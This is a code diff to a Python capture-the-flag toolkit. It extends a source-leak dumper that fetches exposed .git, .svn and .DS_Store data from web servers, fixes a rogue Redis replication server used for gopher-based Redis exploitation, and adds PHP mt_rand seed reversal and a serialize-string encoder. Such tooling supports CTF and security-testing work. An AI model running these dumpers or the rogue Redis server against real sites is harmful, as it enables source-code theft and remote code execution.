@@ -11,9 +11,9 @@ from http.server import HTTPServer
 from itertools import chain
 from json import loads
 from math import ceil
-from os import path, remove
+from os import path
 from queue import Queue
-from re import match, sub
+from re import match, sub, IGNORECASE
 from socket import AF_INET, SO_REUSEADDR, SOCK_STREAM, SOL_SOCKET, socket
 from tempfile import NamedTemporaryFile
 from threading import Lock, Thread
@@ -24,14 +24,16 @@ from zlib import decompress as zlib_decompress
 
 import requests
 import socketio
-from ctfbox.exceptions import (DumpError, FlaskSessionHelperError,
+from ctfbox.exceptions import (DumpError, SvnParseError, DSStoreParseError,
+                               FlaskSessionHelperError,
                                GeneratePayloadError, HashAuthArgumentError,
                                HttprawError, ProvideArgumentError, ScanError)
 from ctfbox.thirdparty.gin import GitParse
+from ctfbox.thirdparty.dsstore import DS_Store
 from ctfbox.thirdparty.phpserialize import serialize
-from ctfbox.utils import (BlindXXEHandler, Context, ProvideHandler, Threader,
+from ctfbox.thirdparty.reverse_mtrand import main as reverse_mt_rand_main
+from ctfbox.utils import (bin2hex, BlindXXEHandler, Context, ProvideHandler, Threader,
                           random_string)
-from requests.sessions import Session
 
 
 class HashType(Enum):
@@ -383,8 +385,11 @@ def hashAuth(startIndex: int = 0, endIndex: int = 5, answer: str = "", maxRange:
 def httpraw(raw: Union[bytes, str], **kwargs) -> Union[requests.Response, requests.Request]:
     """Send raw request by python-requests
 
+    Origin:
+        https://github.com/boy-hack/hack-requests
+
     Args:
-    raw(bytes/str): raw http request
+        raw(bytes/str): raw http request
     kwargs:
         proxies(dict) : requests proxies. Defaults to None.
         timeout(float): requests timeout. Defaults to 60.
@@ -402,7 +407,6 @@ def httpraw(raw: Union[bytes, str], **kwargs) -> Union[requests.Response, reques
     """
     if isinstance(raw, str):
         raw = raw.encode()
-    # ? Origin: https://github.com/boy-hack/hack-requests
     raw = raw.strip()
     send = kwargs.get("send", True)
     session = kwargs.get("session", None)
@@ -1157,7 +1161,7 @@ def gopherredis_msr(host: str, masterHost: str = "127.0.0.1:2020", authPass: str
         while flag:
             getData = client.recv(1024)
             if b"PING" in getData:
-                client.send(b"+PING\r\n")
+                client.send(b"+PONG\r\n")
                 flag = True
             elif b"REPLCONF" in getData:
                 client.send(b"+OK\r\n")
@@ -1186,7 +1190,7 @@ def gopherredis_msr(host: str, masterHost: str = "127.0.0.1:2020", authPass: str
     print("--- Build server ---")
     host_list = masterHost.split(":")
     ip, port = host_list[0], host_list[1]
-    print(f"Listen on {host}:{port}... ")
+    print(f"Listen on {ip}:{port}... ")
     RogueServer(ip=ip, port=int(port))
 
     print("--- Load module ---")
@@ -1245,7 +1249,7 @@ class _BasicDumper(object):
         }
         self.threadNum = threadNum
         self.lock = Lock()
-        self.session = Session()
+        self.session = requests.Session()
 
     def start(self):
         self.dump()
@@ -1261,7 +1265,10 @@ class _BasicDumper(object):
         outdir = os.path.dirname(fullname)
         if outdir:
             if not os.path.exists(outdir):
-                os.makedirs(outdir)
+                try:
+                    os.makedirs(outdir)
+                except FileExistsError:
+                    pass
             elif os.path.isfile(outdir):
                 # 如果之前已经作为文件写入了，则需要删除
                 self.lock.acquire()
@@ -1275,9 +1282,10 @@ class _BasicDumper(object):
         status, data = self.fetch(url)
         if status != 200 or data is None:
             # None才代表出错，data可能为b""
-            raise DumpError("Fetch file error: [%s] %s %s" % (status, url, filename))
+            raise DumpError("Fetch file error: [%s] %s %s" % (
+                status, url, filename))
         self.lock.acquire()
-        print("[%s] %s %s" % (status, url, filename))
+        print("[+] %s" % (filename))
         self.lock.release()
 
         # 处理数据（如有必要）
@@ -1315,7 +1323,8 @@ class _BasicDumper(object):
 
     def startPool(self):
         with ThreadPoolExecutor(max_workers=self.threadNum) as pool:
-            tasks = [pool.submit(self.download, target) for target in self.targets]
+            tasks = [pool.submit(self.download, target)
+                     for target in self.targets]
             for task in as_completed(tasks):
                 err = task.exception()
                 if err:
@@ -1342,7 +1351,7 @@ class _BasicDumper(object):
 class _GitDumper(_BasicDumper):
     def __init__(self, url: str, outdir: str, threadNum: int = 20):
         super(_GitDumper, self).__init__(url, outdir, threadNum)
-        self.base_url = sub(".git.*", ".git", url)
+        self.base_url = sub("\.git.*", ".git", url)
 
     def start(self):
         """ 入口方法 """
@@ -1357,11 +1366,13 @@ class _GitDumper(_BasicDumper):
                     filename = entry.get("name", "").strip()
                     if not sha1 or not filename:
                         continue
-                    targetUrl = "%s/objects/%s/%s" % (self.base_url, sha1[:2], sha1[2:])
+                    targetUrl = "%s/objects/%s/%s" % (
+                        self.base_url, sha1[:2], sha1[2:])
                     self.targets.append((targetUrl, filename))
             self.startPool()
         finally:
-            os.remove(idxFile.name)
+            if idxFile:
+                os.remove(idxFile.name)
 
     def convert(self, data: bytes) -> bytes:
         """ 用zlib对数据进行解压 """
@@ -1378,37 +1389,39 @@ class _GitDumper(_BasicDumper):
 class _SvnDumper(_BasicDumper):
     def __init__(self, url: str, outdir: str, threadNum: int = 20):
         super(_SvnDumper, self).__init__(url, outdir, threadNum)
-        self.base_url = sub(".svn.*", ".svn", url)
+        self.base_url = sub("\.svn.*", ".svn", url)
 
     def start(self):
         """ dumper入口方法 """
         entries_url = self.base_url + "/entries"
         status, data = self.fetch(entries_url)
         if not data:
-            raise DumpError("Fetch entries file error")
+            raise SvnParseError("Fetch entries file error")
         if data == b"12\n":
             self.dump()
         else:
             # TODO: 针对svn1.7以前的版本
-            print("DUMP LEGACY... TODO", fg="yellow")
+            print("SVN version before 1.7, todo")
             self.dump_legacy()
 
     def dump(self):
         try:
             """ 针对svn1.7以后的版本 """
             # 创建一个临时文件用来存储wc.db
-            idxfile = self.indexfile(self.base_url + "/wc.db")
+            idxFile = self.indexfile(self.base_url + "/wc.db")
             # 从wc.db中解析URL和文件名
-            for item in self.parse(idxfile.name):
+            for item in self.parse(idxFile.name):
                 sha1, filename = item
                 if not sha1 or not filename:
                     continue
-                url = "%s/pristine/%s/%s.svn-base" % (self.base_url, sha1[6:8], sha1[6:])
+                url = "%s/pristine/%s/%s.svn-base" % (
+                    self.base_url, sha1[6:8], sha1[6:])
                 self.targets.append((url, filename))
-            idxfile.close()
+            idxFile.close()
             self.startPool()
         finally:
-            remove(idxfile.name)
+            if idxFile:
+                os.remove(idxFile.name)
 
     def dump_legacy(self):
         """ 针对svn1.7以前的版本 """
@@ -1421,7 +1434,8 @@ class _SvnDumper(_BasicDumper):
             cursor = conn.cursor()
             cursor.execute("select checksum, local_relpath from NODES")
             items = cursor.fetchall()
-            cursor.execute("select checksum, substr(md5_checksum,7) from PRISTINE")
+            cursor.execute(
+                "select checksum, substr(md5_checksum,7) from PRISTINE")
             items.extend(cursor.fetchall())
             newitems = []
             checksumList = []
@@ -1432,11 +1446,51 @@ class _SvnDumper(_BasicDumper):
             conn.close()
             return newitems
         except Exception as e:
-            raise DumpError("Sqlite connection failed") from e
+            raise SvnParseError(
+                "Invalid .svn / Sqlite connection failed") from e
 
 
-def leakdump(url: str, outputDir: str = ""):
-    """A function for source code leaks, support .git .svn
+class _DSStoreDumper(_BasicDumper):
+    def __init__(self, url: str, outdir: str, threadNum: int = 20):
+        super(_DSStoreDumper, self).__init__(url, outdir, threadNum)
+        self.base_url = sub("/\.DS_Store.*", "", url, flags=IGNORECASE)
+        self.url_queue = Queue()
+
+    def start(self):
+        self.url_queue.put(self.base_url)
+        self.parse_loop()
+        self.dump()
+
+    def dump(self):
+        self.startPool()
+
+    def parse_loop(self):
+        """ 从url_queue队列中读取URL，根据URL获取并解析DS_Store """
+        while not self.url_queue.empty():
+            base_url = self.url_queue.get()
+            status, ds_data = self.fetch(base_url + "/.DS_Store")
+            if status != 200 or not ds_data:
+                continue
+            try:
+                # 解析DS_Store
+                ds = DS_Store(ds_data)
+                sets = set(ds.traverse_root())
+                if not sets:
+                    raise DSStoreParseError("Empty .DS_Store")
+                for filename in sets:
+                    new_url = "%s/%s" % (base_url, filename)
+                    self.url_queue.put(new_url)
+                    # 从URL中获取path并删除最前面的/
+                    # 不删除/会导致path.join出错，从而导致创建文件失败
+                    fullname = urlparse(new_url).path.lstrip("/")
+                    self.targets.append((new_url, fullname))
+            except Exception as e:
+                # 如果解析失败则不是DS_Store文件
+                raise DSStoreParseError("Invalid .DS_Store") from e
+
+
+def leakdump(url: str, outputDir: str = "", threadNum: int = 20):
+    """A function for source code leaks, support .git .svn .DS_Store
 
     Origin:
         https://github.com/0xHJK/dumpall
@@ -1444,26 +1498,72 @@ def leakdump(url: str, outputDir: str = ""):
     Args:
         url (str): the target url.
         outputDir (str, optional): Output directory. Defaults to ./{hostname}.
+        threadNum (int, optional): thread number. Defaults to 20.
 
     Raises:
         DumpError
 
     Example:
         leakdump("http://example.com/.git")
+        leakdump("http://example.com/.svn")
+        leakdump("http://example.com/.DS_Store")
     """
 
     url = url.rstrip("/")
+    lower_url = url.lower()
     if not outputDir:
         parsed_url = urlparse(url)
         outputDir = path.join("./", parsed_url.hostname)
-    availiable_endswith = [".git", ".svn"]
-    if not any(ends for ends in availiable_endswith if url.endswith(ends)):
+    availiable_endswith = [".git", ".svn", ".ds_store"]
+    if not any(ends for ends in availiable_endswith if lower_url.endswith(ends)):
         raise DumpError("Not availiable url")
 
-    if url.endswith(".git"):
-        dumper = _GitDumper(urljoin(url, ".git"), outputDir)
+    if lower_url.endswith(".git"):
+        dumper = _GitDumper(url, outputDir, threadNum)
         dumper.start()
 
-    if url.endswith(".svn"):
-        dumper = _SvnDumper(urljoin(url, ".svn"), outputDir)
+    if lower_url.endswith(".svn"):
+        dumper = _SvnDumper(url, outputDir, threadNum)
         dumper.start()
+
+    if lower_url.endswith(".ds_store"):
+        dumper = _DSStoreDumper(url, outputDir, threadNum)
+        dumper.start()
+
+
+def reverse_mt_rand(_R000: int, _R227: int, offset: int, flavour: int) -> int:
+    """reverse mt_rand seed without brute force
+
+    Origin:
+        https://github.com/ambionics/mt_rand-reverse
+
+    Args:
+        _R000 (int): first random value.
+        _R227 (int): 228th random value.
+        offset (int): number of mt_rand() calls in between the seeding and the first value.
+        flavour (int): 0 (PHP5) or 1 (PHP7+)
+
+    Returns:
+        int: the seed
+    """
+    return reverse_mt_rand_main(_R000, _R227, offset, flavour)
+
+
+def php_serialize_S(string: str) -> str:
+    """change normal string to php serialize S stirng
+
+    Args:
+        string (str): normal string
+
+    Returns:
+        str: php serialize S stirng
+    """
+    string = bin2hex(string)
+    if not string:
+        return ""
+
+    S_string = ""
+    for i in range(0, len(string), 2):
+        S_string += "\\" + string[i:i+2]
+
+    return S_string
